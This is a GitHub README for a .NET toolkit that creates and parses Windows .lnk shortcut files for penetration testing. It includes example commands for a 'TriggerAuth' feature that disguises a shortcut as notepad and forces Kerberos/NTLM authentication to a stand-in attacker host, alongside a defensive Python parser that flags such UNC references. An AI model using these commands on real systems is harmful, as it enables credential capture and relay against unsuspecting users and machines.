GitHub: trustedsec/LnkMeMaybe
# LnkMeMaybe
A .NET 8 toolkit for creating and analysing Windows Shell Link (`.lnk`) files. Includes a command-line builder (`LnkMeMaybe`) and a graphical editor (`LnkUi`). Intended for security research and penetration testing.
## Projects
| Project | Description |
|---------|-------------|
| `Lnk/` | Core library. Parses and generates `.lnk` binary format per the [MS-SHLLINK](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/) spec. `LnkHandler` is the main entry point, composing `ShellLinkHeader`, `LinkTargetIDList`, `LinkInfo`, `StringData`, and `ExtraData`. |
| `LnkMeMaybe/` | CLI tool. Commands for generating a variety of `.lnk` files. Uses the Titanis.Cli framework. |
| `LnkUi/` | Avalonia 11 MVVM desktop editor. Seven ViewModels wrap the corresponding `Lnk` library components. Useful for manual exploration and inspection of `.lnk` files. |
| `LnkTests/` | MSTest suite. Real `.lnk` file samples are embedded as resources. Covers `ShellLinkHeader` and `LinkInfo`. |
## CLI — LnkMeMaybe
### Common Parameters
All commands share the following base parameters (from `BaseSavedCommand`):
| Parameter | Alias | Required | Description |
|-----------|-------|----------|-------------|
| `--OutputPath` | | Yes | Filesystem path to write the `.lnk` file. |
| `--Overwrite` | | No | Allow overwriting an existing file at `OutputPath`. |
| `--DisplayName` | | No | Text shown when hovering over the shortcut. Supports `\n` for newlines. |
| `--IconPath` | `-I` | No | Path to an `.exe` or `.dll` to use as the shortcut icon. Must exist on the **target** system. |
| `--IconIndex` | | No | Icon resource index within the file specified by `--IconPath`. Default: `0`. |
### `TriggerAuth` (CVE-2026-25185)
Creates a `.lnk` that triggers Kerberos (falling back to NTLM) authentication to a specified server. The `.lnk` does **not** execute anything.
**Scenarios where authentication is triggered:**
1. A user browses to the share containing the `.lnk` — the user's account authenticates outbound.
2. The `.lnk` is placed in a location the machine is configured to index — `SearchProtocolHost` authenticates as SYSTEM.
3. MSSense is running and the location is not exempt — `MSSense.exe` authenticates as SYSTEM.
**Parameters:**
| Parameter | Alias | Required | Description |
|-----------|-------|----------|-------------|
| `--FakePath` | `-F` | Yes | Path displayed as the target in the `.lnk` properties. |
| `--Server` | `-S` | Yes | Server hostname, IP, or UNC path to send authentication to. Appends `IPC$` if no share is specified. |
| `--Darwin` | | No | Darwin identifier stored in the `.lnk`. Can be any value. Default: `unset`. |
**Examples:**
```
# Send authentication to \\controlled.example.org\IPC$ while posing as notepad
LnkMeMaybe.exe TriggerAuth -F C:\Windows\notepad.exe -S \\controlled.example.org -DisplayName notepad.exe -I C:\Windows\notepad.exe -OutputPath notepad.lnk

# Send authentication to a specific share path while posing as a folder shortcut
LnkMeMaybe.exe TriggerAuth -F C:\Users\Public -S \\controlled.example.org\validshare\somefile.txt -DisplayName C:\Users\Public -I C:\Windows\system32\imageres.dll -IconIndex 3 -OutputPath Public.lnk
```
### `WebShortcut`
Creates a `.lnk` file that points to a web URL. Normally Windows creates a `.url` file for web shortcuts; this command produces a `.lnk` instead.
**Parameters:**
| Parameter | Required | Description |
|-----------|----------|-------------|
| `--Url` | Yes | The URL the shortcut should point to. Must be a well-formed absolute URI. |
**Example:**
```
LnkMeMaybe.exe WebShortcut -Url https://example.org -OutputPath example.lnk
```
### `LocalShortcut`
Creates a standard Windows shortcut to a local file or folder. The target path is stored as a shell item ID list (PIDL) — the native format Windows uses for filesystem shortcuts.
**Parameters:**
| Parameter | Alias | Required | Description |
|-----------|-------|----------|-------------|
| `--TargetPath` | | Yes | Absolute path to the target file or folder. |
| `--Arguments` | | No | Command-line arguments to pass to the target. |
| `--WorkingDirectory` | `-W` | No | Working directory for the target process. |
| `--RunAsAdmin` | | No | Request UAC elevation when the shortcut is launched. |
| `--ShowCommand` | | No | Window state on launch: `Normal`, `Maximized`, or `Minimized`. |
**Examples:**
```
# Create a shortcut to Notepad
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --OutputPath notepad.lnk

# Shortcut with arguments and a custom icon
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\notepad.exe --Arguments myfile.txt --WorkingDirectory C:\Users\Public --OutputPath notepad.lnk -I C:\Windows\notepad.exe

# Shortcut that opens maximised and requests elevation
LnkMeMaybe.exe LocalShortcut --TargetPath C:\Windows\System32\cmd.exe --ShowCommand Maximized --RunAsAdmin --OutputPath cmd_admin.lnk
```
### `EnvShortcut`
Creates a `.lnk` where the target path is stored as an expandable environment-variable string (`EnvironmentVariableDataBlock`). This is the format Windows uses for shortcuts to system executables (e.g. `%SystemRoot%\system32\notepad.exe`). Variables are expanded at launch time, making the shortcut portable across Windows installations.
**Parameters:**
| Parameter | Alias | Required | Description |
|-----------|-------|----------|-------------|
| `--TargetPath` | | Yes | Target path, may include environment variables such as `%SystemRoot%` or `%USERPROFILE%`. |
| `--Arguments` | | No | Command-line arguments to pass to the target. |
| `--WorkingDirectory` | `-W` | No | Working directory for the target process. |
| `--RunAsAdmin` | | No | Request UAC elevation when the shortcut is launched. |
| `--ShowCommand` | | No | Window state on launch: `Normal`, `Maximized`, or `Minimized`. |
**Examples:**
```
# Shortcut to Notepad using an environment variable path
LnkMeMaybe.exe EnvShortcut --TargetPath "%SystemRoot%\system32\notepad.exe" --OutputPath notepad.lnk

# Shortcut to a user-profile app with arguments
LnkMeMaybe.exe EnvShortcut --TargetPath "%LOCALAPPDATA%\MyApp\app.exe" --Arguments "--config default" --WorkingDirectory "%USERPROFILE%" --OutputPath myapp.lnk
```
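For triaging `.lnk` files such as those the commands above produce, the following added example (not part of this repository and not using the `Lnk` library) walks the MS-SHLLINK layout and reports every stored string that is a UNC path. The function names are hypothetical, `LinkTargetIDList` and `LinkInfo` are skipped rather than decoded, and because this README does not say which field `TriggerAuth` writes the server into, the check covers all StringData entries and the three fixed-size string blocks.

```python
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits announcing a StringData entry, in on-disk order (MS-SHLLINK 2.1.1, 2.4)
STRING_FLAGS = [(0x04, "NAME_STRING"), (0x08, "RELATIVE_PATH"), (0x10, "WORKING_DIR"),
                (0x20, "COMMAND_LINE_ARGUMENTS"), (0x40, "ICON_LOCATION")]
# ExtraData blocks laid out as 260 bytes ANSI + 520 bytes UTF-16 (BlockSize 0x314)
STRING_BLOCKS = {0xA0000001: "EnvironmentVariableDataBlock", 0xA0000006: "DarwinDataBlock",
                 0xA0000007: "IconEnvironmentDataBlock"}

def parse_lnk(data: bytes) -> dict:
    """Parse a .lnk image; raises ValueError or struct.error on malformed input."""
    if len(data) < 0x4C or data[:4] != b"\x4c\0\0\0" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, strings, blocks = 0x4C, {}, []
    if flags & 0x01:                      # LinkTargetIDList: u16 size, excludes itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:                      # LinkInfo: u32 size, includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & 0x80 else (1, "cp1252")   # IsUnicode
    for bit, name in STRING_FLAGS:
        if flags & bit:                   # u16 character count, no terminator
            end = pos + 2 + struct.unpack_from("<H", data, pos)[0] * width
            strings[name] = data[pos + 2:end].decode(codec, "replace")
            pos = end
    while pos + 8 <= len(data):           # ExtraData ends with a BlockSize < 4
        size, sig = struct.unpack_from("<II", data, pos)
        if size < 8 or pos + size > len(data):
            break
        blocks.append(name := STRING_BLOCKS.get(sig, hex(sig)))
        if sig in STRING_BLOCKS and size == 0x314:
            body = data[pos + 8:pos + 788]     # report both copies; they can differ
            strings[name + ".Ansi"] = body[:260].split(b"\0")[0].decode("cp1252", "replace")
            strings[name + ".Unicode"] = body[260:].decode("utf-16-le", "replace").split("\0")[0]
        pos += size
    return {"flags": flags, "strings": strings, "blocks": blocks}

def remote_references(data: bytes) -> dict:
    """Fields holding a UNC path: resolving them makes the host contact that server."""
    return {k: v for k, v in parse_lnk(data)["strings"].items() if v.startswith("\\\\")}

def constructed_sample() -> bytes:
    """Constructed test image (not tool output): icon string + EnvironmentVariableDataBlock."""
    head = struct.pack("<I16sI", 0x4C, LNK_CLSID, 0x40 | 0x80 | 0x200).ljust(0x4C, b"\0")
    icon, unc = "C:\\Windows\\notepad.exe", "\\\\controlled.example.org\\IPC$"
    env = struct.pack("<II", 0x314, 0xA0000001) + unc.encode("cp1252").ljust(260, b"\0")
    env += unc.encode("utf-16-le").ljust(520, b"\0")
    return head + struct.pack("<H", len(icon)) + icon.encode("utf-16-le") + env + b"\0" * 4
```

Run `remote_references(open(path, "rb").read())` over shortcuts found on shares, indexed locations, or endpoint-scanned folders; a non-empty result names the field and the server it points at.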
## Building
```
# Build (debug)
dotnet build Lnk.sln

# Build (release, core projects only)
dotnet build -c Release build.slnf

# Run all tests
dotnet test

# Run a specific test class
dotnet test --filter "ClassName=lnkHeader"

# Publish self-contained single-file executable (Windows x64)
dotnet publish -c Release -r win-x64 -p:PublishSingleFile=true -p:DebugType=None --self-contained true --output LnkMeMaybeWindows LnkMeMaybe/LnkMeMaybe.csproj
```
## Releases
Pre-built binaries for Windows, Linux, and macOS (x64 and arm64) are available on the [Releases](../../releases) page.
Each release includes both **standalone** (no .NET runtime required) and **framework-dependent** (requires .NET 8 runtime) builds for `LnkMeMaybe` and `LnkUi`.
## AI Usage Disclosure
AI systems were used for the following tasks:
- Code quality review
- README generation
- GitHub workflow actions
The code present in this repository was otherwise human created and reviewed.